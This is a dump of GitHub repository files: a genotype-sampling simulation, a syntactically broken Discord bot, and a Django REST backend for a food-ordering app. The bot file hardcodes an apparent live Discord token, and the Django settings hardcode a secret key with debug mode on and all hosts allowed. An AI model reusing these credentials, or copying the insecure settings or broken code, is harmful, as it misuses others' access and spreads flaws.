10))\n x = samplesize\n y = sd\n x_title = \"sample size\"\n y_title = \"σ of growth rate\"\n z = \"SamplesizeSDgrowth\"\n elif np.size(sd) > 1 and np.size(numgenos) > 1 and np.size(samplesize) == 1:\n numgenos = np.array(numgenos)\n samplesize = np.array([samplesize])\n array = np.zeros((len(numgenos), len(sd), 10))\n sd = np.array(sd)\n x = sd\n y = numgenos\n x_title = \"σ of growth rate\"\n y_title = \"number of genotypes\"\n z = \"NumgenosSDgrowth\"\n else:\n raise ValueError('Exactly two variables (numgenos, sd or samplesize) need to be defined by a range of values!')\n if np.size(sd) > 1 and 'sample' in kwargs:\n raise ValueError('The estimation of genotype richness for a specific sample size requires ranges of number of genotypes (numgenos) and samplesizes!')\n\n import numpy as np\n import matplotlib.pyplot as plt\n import random\n import pandas as pd\n import seaborn as sns\n \n if 'sample' in kwargs:\n if kwargs['sample'] not in samplesize:\n raise ValueError('The value of \"sample\" needs to be included in the range of sample sizes!')\n else:\n [[num]] = np.where(samplesize == kwargs['sample'])\n sampleprobs2 = pd.DataFrame(columns = numgenos)\n\n for i in range(0, 10):\n sampleprobs = np.zeros((100, len(numgenos)))\n meanprobs3 = [] # set up final probability matrix\n # set up population matrix\n for a in range(len(numgenos)): \n pops=np.zeros((numgenos[a], 4))\n startamount = []\n \n for j in range(0, numgenos[a]):\n startamount.append(random.randint(mincell, maxcell)) \n pops[:, 0] = startamount\n \n # set up probability matrices for intermediate loops\n meanprobs1 = []\n meanprobs2 = []\n \n # assign growthrates to genotypes, calculate proportion of genotypes after exponential growth\n for b in range(len(sd)):\n pops[:, 1] = np.array(np.random.normal(loc=growthrate, scale=sd[b], size=numgenos[a]))\n pops[:, 2] = pops[:, 0] * np.exp(pops[:, 1] * days)\n pops[:, 3] = pops[:, 2]/sum(pops[:, 2])\n \n # Repeated picking (100 times) of clones with different sample sizes\n stats = []\n picks = [None] * len(samplesize)\n uniqpicks = [None] * len(samplesize)\n prop = [None] * len(samplesize)\n for d in range(0, 100):\n for e in range(len(samplesize)):\n picks[e] = random.choices(population=range(0, numgenos[a]), # pick cells\n weights=pops[:, 3],\n k=samplesize[e])\n\n uniqpicks[e] = np.unique(picks[e], return_counts=False) # identify distinct genotypes\n prop[e] = (samplesize[e] - len(uniqpicks[e]))/samplesize[e] # calculate proportion of clones in each sample (sample size) \n stats.append(prop.copy()) # append the proportions from each picking step to growing list\n if 'sample' in kwargs:\n sampleprobs[:, a] = [row[num] for row in stats]\n meanprobs1.append(np.mean(stats, axis = 0)) # calculate mean proportion of clones across 100 repeats and append it for each sd to growing list\n if np.size(samplesize) == 1:\n meanprobs2 = np.array(meanprobs1).T.tolist() # transpose\n if np.size(samplesize) > 1:\n meanprobs2 = meanprobs1\n if np.size(numgenos) > 1:\n meanprobs3.append(meanprobs2) # append mean proportions for each population size (numgenos) to growing list\n if np.size(numgenos) == 1:\n meanprobs3 = meanprobs2\n if 'sample' in kwargs:\n sampleprobs1 = pd.DataFrame(sampleprobs, columns = y)\n sampleprobs2 = sampleprobs2.append(sampleprobs1, ignore_index=True)\n # transform into numpy array\n out = pd.DataFrame(np.array(meanprobs3).reshape(len(y), len(x)))\n array[:, :, i] = out # fill 3D array\n print((i+1)*10,'%')\n if 'sample' in kwargs:\n sampleprobs2.to_csv('Probs_for_Sample.csv')\n df = np.mean(array, axis=2) # calculate means of 100 repetions\n df = pd.DataFrame(df, index = y, columns = x)\n df.to_csv(z+'_GenRis.csv')\n \n df_percent = df * 100\n df_percent = df_percent.round()\n df_percent = df_percent.astype(int)\n \n #plot as heatmap\n sns.set(font_scale=0.6)\n fig, ax = plt.subplots()\n ax = sns.heatmap(df_percent, annot=True, fmt=\"d\", linewidth=.2, cbar_kws={'label': 'probability of picking clones (%)'})\n ax.set_yticklabels(ax.get_yticklabels(), rotation=0)\n ax.set(xlabel = x_title, ylabel = y_title)\n fig.savefig(z+\"_Heatmap.pdf\")\n \n \nif __name__ == \"__main__\":\n genris()\n"
},
{
"alpha_fraction": 0.8339805603027344,
"alphanum_fraction": 0.8339805603027344,
"avg_line_length": 92.63636016845703,
"blob_id": "db40634689f52d08c2cd1fb68393c896c7c84e60",
"content_id": "b019e4f4de9b5cc9e7f016421deb5226795566bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1030,
"license_type": "no_license",
"max_line_length": 732,
"num_lines": 11,
"path": "/README.md",
"repo_name": "ingrid-miriel/PickingClones",
"src_encoding": "UTF-8",
"text": "# GenRis\nLarge genetic diversity and low number of observed identical multi-locus genotypes (MLG) in population genetic studies of aquatic microalgae create challenges when interpreting the proportion of MLGs in natural algal blooms. This computer model was therefore created to simulate the composition of microalgal populations after a defined period of exponential growth. We simulated the probability of picking identical MLGs from this population as a function of initial genotypic diversity, intraspecific differences in growth rates and sample size. The number of distinct genotypes in each population can then be extrapolated from the model outputs and observed proportion of identical MLGs in respective population genetic studies. \n\n\n\n# CurveFitting\nFitting a curve through the mean probabilities of picking identical MLGs in a range of population sizes and a set sample size to estimate genotypic richness based on an observed proportion of identical MLGs.\n\n#\n\nPlease see the included user manual for more information.\n"
}
] | 3 |
smashinfashion/bug-smash-bot | https://github.com/smashinfashion/bug-smash-bot | af96f24567e34807b2b4b142e810469fdff6a1b5 | 87b8258e6b3c362f8f1d4d57e260c9d830abee65 | 44994da7c3dd75933098e3fe4f32bb958ea0ce6e | refs/heads/master | 2017-10-07T14:41:48.636123 | 2017-02-07T18:15:48 | 2017-02-07T18:15:48 | 81,231,103 | 0 | 0 | null | 2017-02-07T16:48:38 | 2017-02-07T16:48:38 | 2017-02-07T16:57:07 | null | [
{
"alpha_fraction": 0.6631578803062439,
"alphanum_fraction": 0.6715789437294006,
"avg_line_length": 20.590909957885742,
"blob_id": "2a5f74bb2cb5eae5e2c5eb635691cc07c0bc7c20",
"content_id": "92279148d91a80f8c03bd93fd5df20bb45c7fde1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 475,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 22,
"path": "/malina.py",
"repo_name": "smashinfashion/bug-smash-bot",
"src_encoding": "UTF-8",
"text": "import discord\n\nclient = discord.Client()\n\[email protected]\nasync def on_message(message):\n #ignore the message if the bot is the author\n if message.author == client.user:\n return\n\n if message.content.startswith('!hello')\n await client.send_message(message.channel, 'Hi there! :)')\n\t\n\[email protected]\nasync def on_ready():\n print('Logged in as'\n print(client.user.name)\n print(client.user.id)\n print('------')\n\nclient.run('Mjc4NTg0ODM4Mjg4NTcyNDI2.C3ucBw.fpH5c_5E3FRidqKpXdYKAHUm5pc')\n"
},
{
"alpha_fraction": 0.790123462677002,
"alphanum_fraction": 0.790123462677002,
"avg_line_length": 39,
"blob_id": "f7823f331a740929b9a67ab9b27209c576b65e3d",
"content_id": "f4d489d50326cfea5c2f3a422d16fc23a10fa3a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 81,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 2,
"path": "/README.md",
"repo_name": "smashinfashion/bug-smash-bot",
"src_encoding": "UTF-8",
"text": "# bug-smash-bot\nA discord chatbot for reporting Overwatch bugs. Uses discord.py\n\n"
}
] | 2 |
sheymen/Gourmory | https://github.com/sheymen/Gourmory | 0d1c65a9df91890efae4ed4497dd05b213bc9913 | e6ace6c0746f64ae549b28a55da3fb44989e8a4c | 85dfc7336c8d9c3414d3e69825a76a0e94782fb2 | refs/heads/master | 2021-01-25T10:56:13.350149 | 2017-06-11T16:20:28 | 2017-06-11T16:20:28 | 93,894,360 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6869198083877563,
"alphanum_fraction": 0.6928269863128662,
"avg_line_length": 38.5,
"blob_id": "5775f9b8e6b2b60a3be7523f870b867c56a27ba1",
"content_id": "b330f37ffa32792135385ce107bbb28e72156fcb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1185,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 30,
"path": "/Gourmery/urls.py",
"repo_name": "sheymen/Gourmory",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\nfrom rest_framework import routers\n\n\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'Gourmery.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')), \n\n url(r'^adminCre8215&11/', include(admin.site.urls)),\n url(r'^token_auth/$','rest_framework.authtoken.views.obtain_auth_token'),\n\n #API\n url(r'^hello/','API.views.hello_world',name='hello'),\n url(r'^api/getUserInfo','API.views.getUserInfo',name='getUserInfo'),\n url(r'^api/getUserPayment','API.views.getUserPayment',name='getUserPayment'),\n url(r'^api/getUserGustos','API.views.getUserGustos',name='getUserGustos'),\n url(r'^api/getUserCustomers','API.views.getUserCustomers',name='getUserCustomers'),\n url(r'^api/getUserCurrentOrder','API.views.getUserCurrentOrder',name='getUserCurrentOrder'),\n url(r'^api/getUserOrders','API.views.getUserOrders',name='getUserOrders'),\n url(r'^api/getSucursales','API.views.getSucursales',name='getSucursales'),\n\n]\n"
},
{
"alpha_fraction": 0.5188679099082947,
"alphanum_fraction": 0.7075471878051758,
"avg_line_length": 17.705883026123047,
"blob_id": "78e3dd8571361a7b94142e2509b141654f8d28b3",
"content_id": "d8b4f2157924c3398499dfcbfddf84cbc858c6b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 318,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 17,
"path": "/requirements.txt",
"repo_name": "sheymen/Gourmory",
"src_encoding": "UTF-8",
"text": "amqp==1.4.9\nanyjson==0.3.3\nbilliard==3.3.0.23\ncelery==3.1.18\nDjango==1.8\ndjango-celery==3.1.16\ndjango-cors-middleware==1.2.0\ndjango-filter==0.13.0\ndjango-kombu==0.9.4\ndjango-redis-cache==0.13.1\ndjangorestframework==3.3.3\nkombu==3.0.35\nMarkdown==2.6.6\nPillow==3.2.0\npytz==2016.4\nredis==2.10.5\nredis-simple-cache==0.0.8\n"
},
{
"alpha_fraction": 0.6627534627914429,
"alphanum_fraction": 0.6706510186195374,
"avg_line_length": 24.87845230102539,
"blob_id": "641bec799abbcf4b0d062ec5383b553c1a64d18b",
"content_id": "b13705d5a494269853efcda5ea25ccbcf6a3210d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4685,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 181,
"path": "/Gourmery/settings.py",
"repo_name": "sheymen/Gourmory",
"src_encoding": "UTF-8",
"text": "\"\"\"\nDjango settings for Gourmery project.\n\nGenerated by 'django-admin startproject' using Django 1.8.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.8/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.8/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'yrn#i&lmfskc0k57$ew0cnfntl7+_1&5(b4sh&6zw#@)_s$_&='\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = ['*']\n\nfrom unipath import Path\nRUTA_PROYECTO = Path(__file__).ancestor(2)\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n # AQUI SE MUESTRAN LAS APLICACIONES DE TERCEROS\n 'djcelery',\n 'djkombu', \n 'rest_framework',\n 'rest_framework.authtoken',\n 'corsheaders',\n\n 'API'\n \n \n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n)\n\nROOT_URLCONF = 'Gourmery.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'Gourmery.wsgi.application'\n\n# Manejo de sesiones en cache, para no saturar la base de datos\nSESSION_ENGINE = 'django.contrib.sessions.backends.cached_db'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.8/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'mydatabase',\n #Produccion\n # 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n # 'NAME': '*',\n # 'USER': '*',\n # 'PASSWORD' : '*',\n # 'HOST' : 'localhost',\n # 'PORT' : '', \n }\n}\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.8/topics/i18n/\n\nLANGUAGE_CODE = 'es-mx'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n\n\nMEDIA_URL = '/media/'\n\nMEDIA_ROOT = RUTA_PROYECTO.child('media')\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.8/howto/static-files/\n\nSTATIC_ROOT = '/opt/Gourmery/v0.1/static/'\n\nSTATIC_URL = '/static/'\n\nREST_FRAMEWORK = {\n 'DEFAULT_AUTHENTICATION_CLASSES':(\n 'rest_framework.authentication.SessionAuthentication',\n 'rest_framework.authentication.TokenAuthentication',\n ),\n 'DEFAULT_PERMISSION_CLASSES': (\n 'rest_framework.permissions.IsAuthenticated',\n ),\n 'DEFAULT_FILTER_BACKENDS': (\n 'rest_framework.filters.DjangoFilterBackend',\n ),\n\n}\n\n# Base de datos Redis\nCACHES = {\n 'default':{\n 'BACKEND':'redis_cache.RedisCache',\n 'LOCATION':'localhost:6379',\n 'OPTION':{\n 'DB':1,\n 'PARSER_CLASS':'redis.connection.HiredisParser'\n }\n } \n}\n\n# Permite trabajar de manera asincrona con redis\n\nimport djcelery\ndjcelery.setup_loader()\n\nBROKER_URL = 'redis://localhost:6379/0' \n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'social.apps.django_app.context_processors.backends',\n 'social.apps.django_app.context_processors.login_redirect',\n \"django.contrib.messages.context_processors.messages\",\n \"django.core.context_processors.request\",\n \"django.core.context_processors.csrf\",\n)\n\n"
},
{
"alpha_fraction": 0.6956138610839844,
"alphanum_fraction": 0.7047736644744873,
"avg_line_length": 32.38823699951172,
"blob_id": "c1279a8ef1e44d6cc50ef93bac798d88c29a0dba",
"content_id": "0eb2fc7400280ae11aeb07e9013619f027df4fb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5677,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 170,
"path": "/API/models.py",
"repo_name": "sheymen/Gourmory",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom django.db import models\n\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n\n\nclass User_info(models.Model): \n user = models.OneToOneField(User) \n name = models.CharField(max_length=255)\n userName = models.CharField(max_length=255)\n email = models.CharField(max_length=255)\n phone = models.CharField(max_length=255)\n profile_picture = models.ImageField(upload_to='profile_User')\n last_connection = models.DateTimeField()\n reputacion = models.IntegerField()\n\n def __unicode__(self):\n return unicode(self.user)\n \nclass Menu(models.Model): \n id_menu = models.AutoField(primary_key=True)\n id_sucursal = models.ForeignKey('Sucursal', related_name='sucursal_menu')\n descripcion = models.CharField(max_length=255)\n tipo_comida = models.CharField(max_length=255)\n precio = models.IntegerField()\n photo_menu = models.ImageField(upload_to='photo_menu')\n\n def __unicode__(self):\n return unicode(self.id_menu)\n\n \nclass Pedido(models.Model): \n id_pedido = models.AutoField(primary_key=True)\n id_userInfo = models.ForeignKey('User_info', related_name='user_infoPedido')\n id_direccion = models.ForeignKey('Direccion', related_name='direccion_pedido')\n Precio_total = models.IntegerField()\n Date = models.DateTimeField()\n hour = models.DateTimeField()\n id_statusOrden = models.ForeignKey('Status_orden', related_name='status_ordenPedido')\n\n def __unicode__(self):\n return unicode(self.id_pedido)\n\n \nclass Vendedor(models.Model): \n id_vendedor = models.AutoField(primary_key=True)\n id_user_info = models.ForeignKey('User_info', related_name='user_infoVendedor')\n status = models.IntegerField()\n\n def __unicode__(self):\n return unicode(self.id_vendedor)\n\n \nclass Direccion(models.Model): \n id_direccion = models.AutoField(primary_key=True)\n direccion = models.CharField(max_length=255)\n\n def __unicode__(self):\n return unicode(self.id_direccion)\n\n \nclass Listapedido(models.Model): \n id_listapedido = models.AutoField(primary_key=True)\n id_menu = models.ForeignKey('Menu', related_name='menuListaPedido')\n id_pedido = models.ForeignKey('Pedido', related_name='menuPedido')\n cantidad = models.IntegerField()\n\n def __unicode__(self):\n return unicode(self.id_listapedido)\n\n \nclass Sucursal(models.Model): \n id_sucursal = models.AutoField(primary_key=True)\n name = models.CharField(max_length=255)\n phone = models.CharField(max_length=255)\n addres = models.CharField(max_length=255)\n\n def __unicode__(self):\n return unicode(self.id_sucursal)\n\n \nclass Status_orden(models.Model): \n id_statusOrden = models.AutoField(primary_key=True)\n descripcion = models.CharField(max_length=255)\n\n def __unicode__(self):\n return unicode(self.id_statusOrden)\n\n \nclass Lista_direcciones_ip(models.Model): \n id_lista_direcciones_ip = models.AutoField(primary_key=True)\n id_ip_records = models.ForeignKey('Ip_records', related_name='ip_recordsLista_direcciones_ip')\n direccion_ip = models.CharField(max_length=255)\n fecha_usro = models.DateTimeField()\n\n def __unicode__(self):\n return unicode(self.id_lista_direcciones_ip)\n\n \nclass Payment_user_info(models.Model): \n id_payment_user_info = models.AutoField(primary_key=True)\n id_user_info = models.ForeignKey('User_info', related_name='user_infoPayment')\n current_payment = models.CharField(max_length=255)\n saldo = models.IntegerField()\n\n def __unicode__(self):\n return unicode(self.id_payment_user_info)\n\n \nclass Gustos(models.Model): \n id_gustos = models.AutoField(primary_key=True)\n descripcion = models.CharField(max_length=255)\n categoria = models.CharField(max_length=255)\n\n def __unicode__(self):\n return unicode(self.id_gustos)\n\n \nclass Ip_records(models.Model): \n id_ip_records = models.AutoField(primary_key=True)\n id_user_info = models.ForeignKey('User_info', related_name='user_infoIp_records')\n ip_actual = models.CharField(max_length=255)\n\n def __unicode__(self):\n return unicode(self.id_ip_records)\n\n \nclass Lista_gustos(models.Model): \n id_lista_gustos = models.AutoField(primary_key=True)\n id_userInfo = models.ForeignKey('User_info', related_name='user_infoLista_gustos')\n id_gustos = models.ForeignKey('Gustos', related_name='gustos_lista')\n\n def __unicode__(self):\n return unicode(self.id_lista_gustos)\n\n \nclass Payment_Available(models.Model): \n id_payment_Available = models.AutoField(primary_key=True)\n id_payment_userinfo = models.ForeignKey('Payment_user_info', related_name='payment_user_info_available')\n type = models.CharField(max_length=255)\n\n def __unicode__(self):\n return unicode(self.id_payment_Available)\n\n \nclass Vendedor_favorito(models.Model): \n id_vendedor_favorito = models.AutoField(primary_key=True)\n id_user_info = models.ForeignKey('User_info', related_name='user_infoVendedor_favorito')\n fecha_agregado = models.DateTimeField()\n id_vendedor = models.ForeignKey('Vendedor', related_name='vendedor_favorito')\n calificacion = models.IntegerField()\n\n def __unicode__(self):\n return unicode(self.id_vendedor_favorito)\n\n\n# Senal es un elemento que se dispara en django cuando ocurre un cambio, el cual permite liberar el cache para reflejar los cambios\n\nfrom django.core.cache import cache\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom django.contrib.sessions.models import Session\n\n@receiver(post_save)\ndef clear_cache(sender, **kwargs):\n if sender != Session:\n cache.clear()\n\n"
},
{
"alpha_fraction": 0.6874780058860779,
"alphanum_fraction": 0.6892383694648743,
"avg_line_length": 21.44590950012207,
"blob_id": "9ecb144e5f21688c430d5e10c8b07c04e858ad3b",
"content_id": "35fbef29e175ccd70661f60d46beb69b451909e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8521,
"license_type": "no_license",
"max_line_length": 277,
"num_lines": 379,
"path": "/API/views.py",
"repo_name": "sheymen/Gourmory",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom models import * \nfrom rest_framework import viewsets\nfrom rest_framework import status \nfrom rest_framework.decorators import api_view \nfrom rest_framework.response import Response \nfrom rest_framework.permissions import AllowAny\n\nfrom rest_framework import generics, filters\n\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\nfrom django.core import serializers\nimport json\n\n\n\n# Create your views here.\n\n\n@api_view()\ndef hello_world(request):\n return Response({\"message\": \"Hello, world!\"})\n\n\n@api_view()\ndef getUserInfo(request):\n\tprint 'Profile user Api'\n\n\tid_user = (request.GET['id_user'])\n\n\ttry:\n\t\tprofile = User_info.objects.get(Q(id=id_user))\n\texcept Exception, e:\n\t\tprofile = \"\"\n\n\tif profile != \"\":\n\n\t\ttry:\n\t\t\tdata = []\n\t\t\tdata.append({'user': str(profile.user),'email': profile.email,'username': profile.userName,'real_name': profile.name,'phone': profile.phone,'profile_picture': str(profile.profile_picture),'reputacion':str(profile.reputacion),'last_connection':str(profile.last_connection),})\n\n\t\t\n\t\texcept Exception, e:\n\t\t\tprint e\n\n\n\t\tprint data\n\t\ttry:\n\t\t\treturn Response(json.dumps(data))\n\t\texcept Exception, e:\n\t\t\tprint e\n\t\t\n\telse:\n\t\treturn Response({\"message\": \"User no\"})\n\n\n\n\n@api_view()\ndef getUserPayment(request):\n\n\ttry:\n\t\tid_user = (request.GET['id_user'])\n\texcept Exception, e:\n\t\tprint e\n\t\treturn Response({\"message\": \"id_user is required\"})\n\n\ttry:\n\t\tprofile = User_info.objects.get(Q(id=id_user))\n\texcept Exception, e:\n\t\tprofile = \"\"\n\n\tif profile != \"\":\n\n\t\ttry:\n\t\t\tpayment_user_info = Payment_user_info.objects.get(Q(id_user_info = profile))\n\t\texcept Exception, e:\n\t\t\tprint e\n\t\t\tpayment_user_info = \"\"\n\t\t\n\t\tif payment_user_info:\n\t\t\tprint payment_user_info\n\t\t\ttry:\n\t\t\t\tdata = []\n\t\t\t\tdata.append({'current_payment':str(payment_user_info.current_payment),'saldo':str(payment_user_info.saldo),})\n\n\t\t\texcept Exception, e:\n\t\t\t\traise e\n\n\t\t\tprint data\n\t\t\ttry:\n\t\t\t\treturn Response(json.dumps(data))\n\t\t\texcept Exception, e:\n\t\t\t\tprint e\n\t\telse:\n\t\t\treturn Response({\"message\": \"no payment user\"})\n\n\telse:\n\t\treturn Response({\"message\": \"User no\"})\n\n\n\n@api_view()\ndef getUserGustos(request):\n\ttry:\n\t\tid_user = (request.GET['id_user'])\n\texcept Exception, e:\n\t\tprint e\n\t\treturn Response({\"message\": \"id_user is required\"})\n\n\ttry:\n\t\tprofile = User_info.objects.get(Q(id=id_user))\n\texcept Exception, e:\n\t\tprofile = \"\"\n\n\tif profile != \"\":\n\n\t\tlista_gustos = Lista_gustos.objects.filter(Q(id_userInfo=profile))\n\n\t\tgustos=[]\n\n\t\tfor gusto in lista_gustos:\n\t\t\tgustos.append({'categoria':str(gusto.id_gustos.categoria),'descripcion':str(gusto.id_gustos.descripcion),})\n\n\t\tprint gustos\n\t\ttry:\n\t\t\treturn Response(json.dumps(gustos))\n\t\texcept Exception, e:\n\t\t\tprint e\n\telse:\n\n\n\t\treturn Response({\"message\": \"User no\"})\n\n\n@api_view()\ndef getUserCustomers(request):\n\ttry:\n\t\tid_user = (request.GET['id_user'])\n\texcept Exception, e:\n\t\tprint e\n\t\treturn Response({\"message\": \"id_user is required\"})\n\n\ttry:\n\t\tprofile = User_info.objects.get(Q(id=id_user))\n\texcept Exception, e:\n\t\tprofile = \"\"\n\n\tif profile != \"\":\n\n\t\tvendedor_favorito = Vendedor_favorito.objects.filter(Q(id_user_info=profile))\n\n\t\tvendedores=[]\n\n\t\tfor vendedor in vendedor_favorito:\n\t\t\tvendedores.append({'calificacion':str(vendedor.calificacion),'fecha_agregado':str(vendedor.fecha_agregado),'id_vendedor':str(vendedor.id_vendedor),})\n\n\t\tprint vendedores\n\t\ttry:\n\t\t\treturn Response(json.dumps(vendedores))\n\t\texcept Exception, e:\n\t\t\tprint e\n\telse:\n\n\n\t\treturn Response({\"message\": \"User no\"})\n\n\n@api_view()\ndef getUserCurrentOrder(request):\n\ttry:\n\t\tid_user = (request.GET['id_user'])\n\texcept Exception, e:\n\t\tprint e\n\t\treturn Response({\"message\": \"id_user is required\"})\n\n\ttry:\n\t\tprofile = User_info.objects.get(Q(id=id_user))\n\texcept Exception, e:\n\t\tprofile = \"\"\n\n\tif profile != \"\":\n\n\t\tpedido = Pedido.objects.get(Q(id_userInfo=id_user))\n\t\tlista = Listapedido.objects.filter(Q(id_pedido=pedido))\n\t\tlista_pedidos=[]\n\n\t\tif pedido:\n\t\t\tdate = pedido.Date\n\t\t\thour = pedido.hour\n\t\t\tprecio_total = pedido.Precio_total\n\t\t\tstatus_orden = pedido.id_statusOrden.descripcion\n\t\t\tdireccion_entrega = pedido.id_direccion.direccion\n\t\t\tdireccion_entrega = direccion_entrega.encode('utf8')\n\t\t\tprint direccion_entrega\n\n\n\t\t\tpedidos = []\n\t\t\tfor pedido1 in lista:\n\t\t\t\tsucursal_id = pedido1.id_menu.id_sucursal\n\t\t\t\tpedidos.append({'cantidad':str(pedido1.cantidad),'descripcion':str(pedido1.id_menu.descripcion),'tipo_comida':str(pedido1.id_menu.tipo_comida),'photo_menu':str(pedido1.id_menu.photo_menu),})\n\n\n\t\t\tlista_pedidos.append({'date':str(date),'hour':str(hour),'precio_total':str(precio_total),'status_orden':str(status_orden),'pedidos':pedidos,'sucursal_id':str(sucursal_id),'direccion_entrega':str(direccion_entrega),})\n\n\t\t\tprint lista_pedidos\n\t\t\ttry:\n\t\t\t\treturn Response(json.dumps(lista_pedidos))\n\t\t\texcept Exception, e:\n\t\t\t\tprint e\n\t\telse:\n\t\t\tprint('no data in pedido')\n\t\t\treturn Response({\"message\": \"no data in pedido\"})\n\telse:\n\n\n\t\treturn Response({\"message\": \"User no\"})\n\t\t\n\n\n\n@api_view()\ndef getUserOrders(request):\n\ttry:\n\t\tid_user = (request.GET['id_user'])\n\texcept Exception, e:\n\t\tprint e\n\t\treturn Response({\"message\": \"id_user is required\"})\n\n\ttry:\n\t\tprofile = User_info.objects.get(Q(id=id_user))\n\texcept Exception, e:\n\t\tprofile = \"\"\n\n\tif profile != \"\":\n\n\t\tpedido = Pedido.objects.get(Q(id_userInfo=id_user))\n\t\tlista = Listapedido.objects.filter(Q(id_pedido=pedido))\n\t\tlista_pedidos=[]\n\n\t\tif pedido:\n\t\t\tdate = pedido.Date\n\t\t\thour = pedido.hour\n\t\t\tprecio_total = pedido.Precio_total\n\t\t\tstatus_orden = pedido.id_statusOrden.descripcion\n\t\t\tdireccion_entrega = pedido.id_direccion.direccion\n\t\t\tdireccion_entrega = direccion_entrega.encode('utf8')\n\t\t\tprint direccion_entrega\n\n\n\t\t\tpedidos = []\n\t\t\tfor pedido1 in lista:\n\t\t\t\tsucursal_id = pedido1.id_menu.id_sucursal\n\t\t\t\tpedidos.append({'cantidad':str(pedido1.cantidad),'descripcion':str(pedido1.id_menu.descripcion),'tipo_comida':str(pedido1.id_menu.tipo_comida),'photo_menu':str(pedido1.id_menu.photo_menu),})\n\n\n\t\t\tlista_pedidos.append({'date':str(date),'hour':str(hour),'precio_total':str(precio_total),'status_orden':str(status_orden),'pedidos':pedidos,'sucursal_id':str(sucursal_id),'direccion_entrega':str(direccion_entrega),})\n\n\t\t\tprint lista_pedidos\n\t\t\ttry:\n\t\t\t\treturn Response(json.dumps(lista_pedidos))\n\t\t\texcept Exception, e:\n\t\t\t\tprint e\n\t\telse:\n\t\t\tprint('no data in pedido')\n\t\t\treturn Response({\"message\": \"no data in pedido\"})\n\telse:\n\n\n\t\treturn Response({\"message\": \"User no\"})\n\n@api_view()\ndef getUserRecommendations(request):\n\treturn Response({\"message\": \"User no\"})\n\n\n@api_view()\ndef getTopCustomer(request):\n\treturn Response({\"message\": \"User no\"})\n\n\n@api_view()\ndef getSucursales(request):\n\n\tsucursales = Sucursal.objects.filter(Q())\n\n\tif sucursales:\n\n\t\tlista_sucursales = []\n\n\t\tfor sucursal in sucursales:\n\t\t\tlista_sucursales.append({'name':sucursal.name,'phone':sucursal.phone,'addres':sucursal.addres,})\n\n\t\ttry:\n\t\t\treturn Response(json.dumps(lista_sucursales))\n\t\texcept Exception, e:\n\t\t\tprint e\n\n\telse:\n\n\n\t\treturn 